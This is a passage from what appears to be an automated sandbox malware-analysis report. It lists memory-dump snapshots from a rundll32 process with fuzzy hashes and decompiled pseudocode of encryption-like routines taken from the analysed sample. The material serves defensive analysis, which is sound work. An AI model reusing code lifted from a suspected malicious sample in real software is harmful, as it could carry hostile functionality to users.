                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f30a663fca60c0f7f0efcddc5908774804e036e471fe29fb02afc69fccd61e0
                                        • Instruction ID: 78ae2f258fe3e8fbee80199154a9b082bd3a72e0a9a9f106b452f96a189a1804
                                        • Opcode Fuzzy Hash: 9f30a663fca60c0f7f0efcddc5908774804e036e471fe29fb02afc69fccd61e0
                                        • Instruction Fuzzy Hash: E5613673B0429257FB598E25D9993FB2A51B321780F56422ADE4693F81EB7CD41BC304
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF3091D80(long long __rbx, void* __rdx, long long __rdi, void* __r9, long long _a24, long long _a32) {
                                        
                                        				_a24 = __rbx;
                                        				_a32 = __rdi;
                                        				r11d = 0;
                                        				if (r8d > 0) goto 0xf3091dac;
                                        				return 0;
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dad690594b154f1faaf3b1391d93cf52207da30e9cc3dd7bef8987893e5adf10
                                        • Instruction ID: 17eefa9fc3ffbf39d6907bfebe2ad6666feeda647a0f384624aeae16983eb033
                                        • Opcode Fuzzy Hash: dad690594b154f1faaf3b1391d93cf52207da30e9cc3dd7bef8987893e5adf10
                                        • Instruction Fuzzy Hash: 7561D5B6701BD4D6CB14CF8AE444AC8A7A6E3A8FC4B9A9117DF0C57751DB39C686C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb2d6b7479817ecec3bc0374944a3f4d3649efb8e63c587f62d997ac9df90efa
                                        • Instruction ID: 5bb92d1f99c87cd7cfc3eb2ff78b289c15352509ca5e41e8115bb7bf0b71f7bd
                                        • Opcode Fuzzy Hash: eb2d6b7479817ecec3bc0374944a3f4d3649efb8e63c587f62d997ac9df90efa
                                        • Instruction Fuzzy Hash: A651F9727146D489EF514F26A9883AABF51F366FD4F1A4226DECE07B95D938C047C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 33%
                                        			E0000021E21EF305F730(void* __edi, void* __rax, long long __rcx, signed int* __rdx, long long __rdi, long long __rsi, long long __rbp, signed char* __r8, void* __r9, long long __r13, long long _a16, long long _a32, long long _a40, long long _a48, signed int _a96, long long _a104, void* _a120, long long* _a128) {
                                        				long long _v0;
                                        				void* __rbx;
                                        				void* __r14;
                                        				signed char _t79;
                                        				signed int _t80;
                                        				void* _t107;
                                        				signed char _t112;
                                        				signed int _t114;
                                        				signed int _t116;
                                        				unsigned int _t126;
                                        				unsigned int _t127;
                                        				unsigned int _t128;
                                        				void* _t133;
                                        				void* _t135;
                                        				void* _t136;
                                        				long long _t146;
                                        				void* _t147;
                                        				unsigned long long _t156;
                                        				long long _t162;
                                        				void* _t185;
                                        				unsigned long long _t194;
                                        				void* _t196;
                                        				signed long long _t197;
                                        				signed long long _t200;
                                        				signed char* _t203;
                                        				signed char* _t204;
                                        				signed char* _t205;
                                        
                                        				_t171 = __rbp;
                                        				_t169 = __rsi;
                                        				_t162 = __rdi;
                                        				E0000021E21EF310C220();
                                        				_t196 = __r9;
                                        				_a16 =  *((intOrPtr*)(__rcx + 0x180));
                                        				_t146 =  *((intOrPtr*)(__rcx + 0x38)) + __r9;
                                        				_t203 = __r8;
                                        				if (_t146 - 0xffffffe0 > 0) goto 0xf305f9de;
                                        				if (_t146 - __r9 < 0) goto 0xf305f9de;
                                        				_a104 = __rbp;
                                        				_a48 = __rsi;
                                        				 *((long long*)(__rcx + 0x38)) = _t146;
                                        				if ( *((intOrPtr*)(__rcx + 0x174)) == 0) goto 0xf305f7b1;
                                        				_t147 = __rcx + 0x40;
                                        				E0000021E21EF3060130(_t107,  *((intOrPtr*)(__rcx + 0x174)), 0xffffffe0, __rcx, _t147, __rcx + 0x60, __rdi, __rsi, _t185, __r9);
                                        				 *((intOrPtr*)(__rcx + 0x174)) = 0;
                                        				_t114 =  *((intOrPtr*)(__rcx + 0x170));
                                        				_a96 = _t114;
                                        				if (_t114 == 0) goto 0xf305f826;
                                        				_t133 = _t196;
                                        				if (_t133 == 0) goto 0xf305f811;
                                        				_t197 = _t196 - 1;
                                        				_t79 =  *(_t147 + __rcx + 0x10) & 0x000000ff ^  *__rdx;
                                        				 *_t203 = _t79;
                                        				_t204 =  &(_t203[1]);
                                        				 *(_t147 + __rcx + 0x40) =  *(_t147 + __rcx + 0x40) ^ _t79;
                                        				_t116 = _t114 + 0x00000001 & 0x0000000f;
                                        				_a96 = _t116;
                                        				if (_t133 != 0) goto 0xf305f7e1;
                                        				goto 0xf305f819;
                                        				if (_t116 != 0) goto 0xf305f9d4;
                                        				_t156 = __rcx + 0x60;
                                        				_t80 = E0000021E21EF3060130(_t107, _t116, 0xffffffe0, __rcx, __rcx + 0x40, _t156, _t162, _t169, _t185, _t197);
                                        				_a40 = _t162;
                                        				_a32 = __r13;
                                        				_t135 = _t197 - 0xc00;
                                        				if (_t135 < 0) goto 0xf305f8ea;
                                        				_t164 = _t156 >> 0xb;
                                        				_a120 = _t197 + (_t156 >> 0xb) * 0xfffff400;
                                        				_v0 = __rcx;
                                        				r8d = 0xc0;
                                        				 *_a128();
                                        				_t126 = (((( *(__rcx + 0xc) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xd) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xe) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xf) & 0x000000ff) + 0xc0;
                                        				 *(__rcx + 0xf) = bpl;
                                        				 *(__rcx + 0xc) = _t126 >> 0x18;
                                        				r9d = 0xc00;
                                        				 *(__rcx + 0xd) = _t126 >> 0x10;
                                        				 *(__rcx + 0xe) = _t126 >> 8;
                                        				E0000021E21EF305FF60(_t107, _t80 * _t197 >> 0x20, _t135, (_t156 >> 0xb) * 0xfffff400, __rcx, __rcx + 0x40, __rcx + 0x60, _t164, _t169, __rbp, _t204, _a16);
                                        				_t205 =  &(_t204[0xc00]);
                                        				if (_t135 != 0) goto 0xf305f870;
                                        				_t200 = _a120;
                                        				_t194 = _t200 & 0xfffffff0;
                                        				if (_t135 == 0) goto 0xf305f94a;
                                        				_v0 = __rcx;
                                        				 *_a128();
                                        				_t127 = _t126 + __edi;
                                        				 *(__rcx + 0xf) = bpl;
                                        				 *(__rcx + 0xc) = _t127 >> 0x18;
                                        				 *(__rcx + 0xd) = _t127 >> 0x10;
                                        				 *(__rcx + 0xe) = _t127 >> 8;
                                        				E0000021E21EF305FF60(_t107, _t80 * _t197 >> 0x20, _t135, (_t156 >> 0xb) * 0xfffff400, __rcx, __rcx + 0x40, __rcx + 0x60, _t194 >> 4, _t169, _t171, _t205, _t194);
                                        				_t136 = _t200 - _t194;
                                        				if (_t136 == 0) goto 0xf305f9ae;
                                        				 *((intOrPtr*)(__rcx + 0x178))();
                                        				_t128 = _t127 + 1;
                                        				 *(__rcx + 0xf) = bpl;
                                        				 *(__rcx + 0xc) = _t128 >> 0x18;
                                        				 *(__rcx + 0xd) = _t128 >> 0x10;
                                        				 *(__rcx + 0xe) = _t128 >> 8;
                                        				_t112 =  *(__rcx +  &(__rdx[0x300]) + _t194) & 0x000000ff ^  *(__rcx + __rcx + 0x10) & 0x000000ff;
                                        				 *(__rcx +  &(_t205[_t194])) = _t112;
                                        				 *(__rcx + __rcx + 0x40) =  *(__rcx + __rcx + 0x40) ^ _t112;
                                        				if (_t136 != 0) goto 0xf305f990;
                                        				 *((intOrPtr*)(__rcx + 0x170)) = _a96 + 1;
                                        				return 0;
                                        			}


                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • Opcode ID: 4374c69910e2451296d904c00044204cac524f70e87352413a2621000c528a3c
                                        • Instruction ID: fccb6a4768f053be4b0cf76f7d54016ff34329a1f687dcc8a586564adce685c7
                                        • Opcode Fuzzy Hash: 4374c69910e2451296d904c00044204cac524f70e87352413a2621000c528a3c
                                        • Instruction Fuzzy Hash: 4171C4736147D8C6DB518F79AC0439ABFA0F355F98F498216DE888BB89DA3CC406D750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • Opcode ID: 9d13619e0c5c8d2e7efad3f7b247b2a17b77eeffd675606f158e5499028cd542
                                        • Instruction ID: 1cbf59286dba0e8a5a8923754f1978f972df3e99d16f96e8a0b37739bac5949a
                                        • Opcode Fuzzy Hash: 9d13619e0c5c8d2e7efad3f7b247b2a17b77eeffd675606f158e5499028cd542
                                        • Instruction Fuzzy Hash: DC71A233219BC082DF51CB25E8582ABBBA5E7A97C4F5A8213EF8D47B59DA3CC145C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 30%
                                        			E0000021E21EF305F130(void* __edi, void* __rax, long long __rcx, signed char* __rdx, long long __rdi, long long __rsi, long long __rbp, signed char* __r8, void* __r9, long long __r13, long long _a16, long long _a32, long long _a40, long long _a48, signed int _a96, long long _a104, long long* _a128) {
                                        				long long _v0;
                                        				void* __rbx;
                                        				void* __r14;
                                        				signed int _t78;
                                        				void* _t106;
                                        				signed char _t108;
                                        				signed char _t109;
                                        				signed int _t113;
                                        				signed int _t115;
                                        				unsigned int _t125;
                                        				unsigned int _t126;
                                        				unsigned int _t127;
                                        				void* _t132;
                                        				void* _t134;
                                        				void* _t135;
                                        				long long _t145;
                                        				void* _t146;
                                        				unsigned long long _t155;
                                        				void* _t160;
                                        				long long _t161;
                                        				void* _t184;
                                        				signed char* _t185;
                                        				unsigned long long _t192;
                                        				void* _t194;
                                        				signed long long _t195;
                                        				signed long long _t196;
                                        				signed char* _t200;
                                        				signed char* _t201;
                                        
                                        				_t180 = __r9;
                                        				_t170 = __rbp;
                                        				_t168 = __rsi;
                                        				_t161 = __rdi;
                                        				E0000021E21EF310C220();
                                        				_t194 = __r9;
                                        				_a16 =  *((intOrPtr*)(__rcx + 0x180));
                                        				_t145 =  *((intOrPtr*)(__rcx + 0x38)) + __r9;
                                        				_t185 = __r8;
                                        				if (_t145 - 0xffffffe0 > 0) goto 0xf305f3ce;
                                        				if (_t145 - __r9 < 0) goto 0xf305f3ce;
                                        				_a104 = __rbp;
                                        				_a48 = __rsi;
                                        				 *((long long*)(__rcx + 0x38)) = _t145;
                                        				if ( *((intOrPtr*)(__rcx + 0x174)) == 0) goto 0xf305f1b1;
                                        				_t146 = __rcx + 0x40;
                                        				E0000021E21EF3060130(_t106,  *((intOrPtr*)(__rcx + 0x174)), 0xffffffe0, __rcx, _t146, __rcx + 0x60, __rdi, __rsi, _t184, __r9);
                                        				 *((intOrPtr*)(__rcx + 0x174)) = 0;
                                        				_t113 =  *((intOrPtr*)(__rcx + 0x170));
                                        				_a96 = _t113;
                                        				if (_t113 == 0) goto 0xf305f229;
                                        				_t132 = _t194;
                                        				if (_t132 == 0) goto 0xf305f214;
                                        				_t109 =  *__rdx & 0x000000ff;
                                        				_t195 = _t194 - 1;
                                        				_t200 =  &(__rdx[1]);
                                        				 *_t185 =  *(_t146 + __rcx + 0x10) & 0x000000ff ^ _t109;
                                        				 *(_t146 + __rcx + 0x40) =  *(_t146 + __rcx + 0x40) ^ _t109;
                                        				_t115 = _t113 + 0x00000001 & 0x0000000f;
                                        				_a96 = _t115;
                                        				if (_t132 != 0) goto 0xf305f1e1;
                                        				goto 0xf305f21c;
                                        				if (_t115 != 0) goto 0xf305f3c4;
                                        				_t155 = __rcx + 0x60;
                                        				_t78 = E0000021E21EF3060130(_t106, _t115, 0xffffffe0, __rcx, __rcx + 0x40, _t155, _t161, _t168, _t184, _t195);
                                        				_a40 = _t161;
                                        				_a32 = __r13;
                                        				_t134 = _t195 - 0xc00;
                                        				if (_t134 < 0) goto 0xf305f2dc;
                                        				_t163 = _t155 >> 0xb;
                                        				_t196 = _t195 + (_t155 >> 0xb) * 0xfffff400;
                                        				asm("o16 nop [eax+eax]");
                                        				r9d = 0xc00;
                                        				E0000021E21EF305FF60(_t106, _t78 * _t195 >> 0x20, _t134, (_t155 >> 0xb) * 0xfffff400, __rcx, __rcx + 0x40, __rcx + 0x60, _t163, _t168, __rbp, _t200, _t180);
                                        				r8d = 0xc0;
                                        				_v0 = __rcx;
                                        				 *_a128();
                                        				_t125 = (((( *(__rcx + 0xc) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xd) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xe) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xf) & 0x000000ff) + 0xc0;
                                        				 *(__rcx + 0xf) = bpl;
                                        				_t201 =  &(_t200[0xc00]);
                                        				 *(__rcx + 0xc) = _t125 >> 0x18;
                                        				 *(__rcx + 0xd) = _t125 >> 0x10;
                                        				 *(__rcx + 0xe) = _t125 >> 8;
                                        				if (_t134 != 0) goto 0xf305f270;
                                        				_t192 = _t196 & 0xfffffff0;
                                        				if (_t134 == 0) goto 0xf305f340;
                                        				E0000021E21EF305FF60(_t106, _t78 * _t195 >> 0x20, _t134, (_t155 >> 0xb) * 0xfffff400, __rcx, __rcx + 0x40, __rcx + 0x60, _t192 >> 4, _t168, _t170, _t201, _t192);
                                        				_v0 = __rcx;
                                        				_a128();
                                        				_t126 = _t125 + __edi;
                                        				 *(__rcx + 0xf) = bpl;
                                        				 *(__rcx + 0xc) = _t126 >> 0x18;
                                        				 *(__rcx + 0xd) = _t126 >> 0x10;
                                        				 *(__rcx + 0xe) = _t126 >> 8;
                                        				_t135 = _t196 - _t192;
                                        				if (_t135 == 0) goto 0xf305f39e;
                                        				_t160 = __rcx + 0x10;
                                        				 *((intOrPtr*)(__rcx + 0x178))();
                                        				_t127 = _t126 + 1;
                                        				 *(__rcx + 0xf) = bpl;
                                        				 *(__rcx + 0xc) = _t127 >> 0x18;
                                        				 *(__rcx + 0xd) = _t127 >> 0x10;
                                        				 *(__rcx + 0xe) = _t127 >> 8;
                                        				asm("o16 nop [eax+eax]");
                                        				_t108 =  *(_t160 +  &(_t201[_t192])) & 0x000000ff;
                                        				 *(_t160 + __rcx + 0x40) =  *(_t160 + __rcx + 0x40) ^ _t108;
                                        				 *(_t160 +  &(( &(_t185[0xc01]))[_t192])) =  *(__rcx + _t160 + 0x10) & 0x000000ff ^ _t108;
                                        				if (_t135 != 0) goto 0xf305f380;
                                        				 *((intOrPtr*)(__rcx + 0x170)) = _a96 + 1;
                                        				return 0;
                                        			}


                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • Opcode ID: 08eb94d7faca831f58bac78c48e0fd6b6aada628af0aba11f5bd9bb4cd9b8e5b
                                        • Instruction ID: a752a80fbdb0d92d2da6fedaa3932d2f7dcd69f52d7d5963c720bb7f6df6b95a
                                        • Opcode Fuzzy Hash: 08eb94d7faca831f58bac78c48e0fd6b6aada628af0aba11f5bd9bb4cd9b8e5b
                                        • Instruction Fuzzy Hash: 6F61D3727186D8C6DB518F79AC0439A7FA0F361F98F488216DE888BB89DA38C506D754
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • Opcode ID: 7a3ac493c8df203e318e058fb57eff3fb40823cc6b1713a14fda8edb2e05c5b4
                                        • Instruction ID: c1677d8ec80e46bdb34d49c5c4c99936b027ec373e95bdeda85c450f33327068
                                        • Opcode Fuzzy Hash: 7a3ac493c8df203e318e058fb57eff3fb40823cc6b1713a14fda8edb2e05c5b4
                                        • Instruction Fuzzy Hash: A55137B37007848AEF549F26AD883DBA691F765BC4F95412AEE4D87F89DA7CC502C304
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 35%
                                        			E0000021E21EF305FC80(void* __rax, signed int __rcx, void* __rdx, unsigned int __r8, long long __r12, long long __r13, long long __r15) {
                                        				void* __rbx;
                                        				void* __rdi;
                                        				void* __rsi;
                                        				void* __r14;
                                        				signed char _t66;
                                        				unsigned int _t77;
                                        				void* _t78;
                                        				unsigned int _t89;
                                        				void* _t93;
                                        				void* _t99;
                                        				void* _t145;
                                        				signed long long _t148;
                                        				long long _t151;
                                        				void* _t158;
                                        				void* _t159;
                                        				void* _t162;
                                        				void* _t164;
                                        				signed int _t171;
                                        				void* _t172;
                                        				void* _t174;
                                        
                                        				E0000021E21EF310C220();
                                        				_t159 = _t158 - __rax;
                                        				r14d = 0;
                                        				 *__rcx = _t171;
                                        				 *(__rcx + 8) = _t171;
                                        				 *(__rcx + 0x40) = _t171;
                                        				 *(__rcx + 0x48) = _t171;
                                        				 *(__rcx + 0x30) = _t171;
                                        				 *(__rcx + 0x38) = _t171;
                                        				 *(__rcx + 0x170) = _t171;
                                        				if (__r8 != 0xc) goto 0xf305fcde;
                                        				asm("movsd xmm0, [edx]");
                                        				asm("movsd [ecx], xmm0");
                                        				 *(__rcx + 8) =  *(__rdx + 8);
                                        				 *(__rcx + 0xf) = 1;
                                        				goto 0xf305feba;
                                        				 *((long long*)(_t159 + 0x58)) = _t151;
                                        				 *(_t159 + 0x50) = __r8;
                                        				if (__r8 - 0x10 < 0) goto 0xf305fd9a;
                                        				 *((long long*)(_t159 + 0x60)) = __r12;
                                        				 *((long long*)(_t159 + 0x68)) = __r13;
                                        				 *((long long*)(_t159 + 0x20)) = __r15;
                                        				_t148 = __r8 + (__r8 >> 4) * 0xfffffff0;
                                        				_t174 = __rcx + 0xf;
                                        				_t162 =  ~__rcx + __rdx;
                                        				if (__rcx - _t162 + _t174 > 0) goto 0xf305fd60;
                                        				_t93 = _t174 - __rdx;
                                        				if (_t93 < 0) goto 0xf305fd60;
                                        				asm("o16 nop [eax+eax]");
                                        				 *__rcx =  *__rcx ^  *(_t162 + __rcx) & 0x000000ff;
                                        				if (_t93 != 0) goto 0xf305fd40;
                                        				goto 0xf305fd70;
                                        				asm("o16 nop [eax+eax]");
                                        				asm("movdqu xmm1, [ebx]");
                                        				asm("movdqu xmm0, [edi]");
                                        				asm("pxor xmm1, xmm0");
                                        				asm("movdqu [ebx], xmm1");
                                        				E0000021E21EF3060130(_t78, _t93, __rcx + 1, __rcx, __rcx, __rcx + 0x60, __rdx, _t148, _t164, _t171);
                                        				_t145 = __rdx + 0x10;
                                        				if (_t93 != 0) goto 0xf305fd20;
                                        				if (_t148 == 0) goto 0xf305fe3c;
                                        				if (_t148 - 0x20 < 0) goto 0xf305fe04;
                                        				if (__rcx - _t145 - 1 + _t148 > 0) goto 0xf305fdc1;
                                        				if (__rcx - 1 + _t148 - _t145 >= 0) goto 0xf305fe04;
                                        				asm("movdqu xmm0, [eax]");
                                        				_t172 = _t171 + 0x20;
                                        				asm("movdqu xmm1, [eax+ecx]");
                                        				asm("pxor xmm1, xmm0");
                                        				asm("movdqu [eax-0x20], xmm1");
                                        				asm("movdqu xmm1, [ecx+eax-0x10]");
                                        				asm("movdqu xmm0, [eax-0x10]");
                                        				asm("pxor xmm1, xmm0");
                                        				asm("movdqu [eax-0x10], xmm1");
                                        				if (_t172 - (_t148 & 0xffffffe0) < 0) goto 0xf305fdd1;
                                        				_t99 = _t172 - _t148;
                                        				if (_t99 >= 0) goto 0xf305fe30;
                                        				_t146 = _t145 - __rcx;
                                        				_t131 = _t172 + __rcx;
                                        				asm("o16 nop [eax+eax]");
                                        				 *_t131 =  *(_t172 + __rcx) ^  *(_t145 - __rcx + _t172 + __rcx) & 0x000000ff;
                                        				if (_t99 != 0) goto 0xf305fe20;
                                        				_t66 = E0000021E21EF3060130(_t78, _t99, __rcx + 0x20, __rcx, __rcx, __rcx + 0x60, _t145 - __rcx, _t148 - _t172 - 1, _t164, _t172);
                                        				 *(__rcx + 0xf) =  *(__rcx + 0xf) ^ bpl;
                                        				 *(__rcx + 8) =  *(__rcx + 8) ^ _t66;
                                        				 *(__rcx + 9) =  *(__rcx + 9) ^ _t66;
                                        				 *(__rcx + 0xa) =  *(__rcx + 0xa) ^ _t66;
                                        				 *(__rcx + 0xb) =  *(__rcx + 0xb) ^ _t66;
                                        				 *(__rcx + 0xc) =  *(__rcx + 0xc) ^ _t66;
                                        				 *(__rcx + 0xd) =  *(__rcx + 0xd) ^ _t66;
                                        				 *(__rcx + 0xe) =  *(__rcx + 0xe) ^ _t66;
                                        				E0000021E21EF3060130(_t78, _t99,  *(_t159 + 0x50) << 3 >> 8, __rcx, __rcx, __rcx + 0x60, _t146, _t148 - _t172 - 1, _t164, _t172);
                                        				 *((intOrPtr*)(__rcx + 0x178))();
                                        				_t89 = (((( *(__rcx + 0xc) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xd) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xe) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xf) & 0x000000ff) + 1;
                                        				 *(__rcx + 0xf) = dil;
                                        				 *(__rcx + 0xc) = _t89 >> 0x18;
                                        				 *(__rcx + 0xd) = _t89 >> 0x10;
                                        				_t77 = _t89 >> 8;
                                        				 *(__rcx + 0xe) = _t77;
                                        				return _t77;
                                        			}


                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad8bd55bc2d697952041d5995c24693b42f9b19df9ac9196bf8c164706034983
                                        • Instruction ID: c0b5d74b7fd05acadd6d670d4621f5bc2b4f23a64c87de87be4d20c054671c70
                                        • Opcode Fuzzy Hash: ad8bd55bc2d697952041d5995c24693b42f9b19df9ac9196bf8c164706034983
                                        • Instruction Fuzzy Hash: 1B61D333705BD886DB428F3D984829DBBA1E795F94F598222DF885BB46DA3CC147D310
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 288e2026ff6ccf7f08683cf24952f53388a3e0fe86fd28f38f5655c2ccb56e9f
                                        • Instruction ID: 02490b58c4177f8dac7471dd2b08bbe394a76375b70b55b6cda0a42a611d78b9
                                        • Opcode Fuzzy Hash: 288e2026ff6ccf7f08683cf24952f53388a3e0fe86fd28f38f5655c2ccb56e9f
                                        • Instruction Fuzzy Hash: F7416D32315F8492DE588B25E98439AB3A4F78D788F464116EF9D87B55EF38D066C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9b0259fc13aa45cf0f4fb9fd96128437a168a6a204d38d7642595161896a58fe
                                        • Instruction ID: 89d2f5c845037166907ecbc68909d41ac22871b5293d7e93b172a48781a3a57f
                                        • Opcode Fuzzy Hash: 9b0259fc13aa45cf0f4fb9fd96128437a168a6a204d38d7642595161896a58fe
                                        • Instruction Fuzzy Hash: 53317E323340A407F39C9A399D2676B6292E788790F48E535FE57C3B82D93DE9028740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49814b760f157449b557be1b193983b914fc33743bf73b349ee52548f4893ab9
                                        • Instruction ID: b0491160252ba1d0b2adda9b0d0863c6cbfb9442c368b04d7471aef4c20bb53b
                                        • Opcode Fuzzy Hash: 49814b760f157449b557be1b193983b914fc33743bf73b349ee52548f4893ab9
                                        • Instruction Fuzzy Hash: 21412662B206C083EB54DB38D9497AD6B50F7B6B88F89E126DF4947F43DA2CC295C310
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7942675228193484f27a21526832a396cf736fef8e68fc522a771d9c029a6ce9
                                        • Instruction ID: adf11d596878a9268c27f9405f86155a55bb01817f1532f14aa5115aef61406f
                                        • Opcode Fuzzy Hash: 7942675228193484f27a21526832a396cf736fef8e68fc522a771d9c029a6ce9
                                        • Instruction Fuzzy Hash: 2C41E663326AC486D700CB6E88001CDAF21E37AB9475DD366EFA89B796C63AD513C350
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4da94681ccef41a7f9e7b1b14e1b17fce95b599c87d7f430f1eb3c8d4f29bbbe
                                        • Instruction ID: 9fb84a4c2f44059300dfc1d222a8c7e485f146f2a7a33f3d137158b10525ee6d
                                        • Opcode Fuzzy Hash: 4da94681ccef41a7f9e7b1b14e1b17fce95b599c87d7f430f1eb3c8d4f29bbbe
                                        • Instruction Fuzzy Hash: E741F2633092D08FD719CB6DA8845AE7F61E366740B09C09ADFD287F83C62CE625C721
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a430118937763756cfd9845112f19dda3f9eab06c6fccdf5a21b26eff2b409c9
                                        • Instruction ID: be26dcecf3c40cc8a9ec574b3757f2c9fcb79fd0478fe4a901f8cb166e625a73
                                        • Opcode Fuzzy Hash: a430118937763756cfd9845112f19dda3f9eab06c6fccdf5a21b26eff2b409c9
                                        • Instruction Fuzzy Hash: 48319C632197C943DF719B2AA80438FAA71E355B90F585066DFCA0BF47DA2CE246C345
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 44dcb8144966f291c8043e523ed49a2bb20ced730489c510516e1e3c0a649c22
                                        • Instruction ID: c944ec238952e8c54fc85a5fe30413e5be565e72dcad289819dc6fe2d98f7302
                                        • Opcode Fuzzy Hash: 44dcb8144966f291c8043e523ed49a2bb20ced730489c510516e1e3c0a649c22
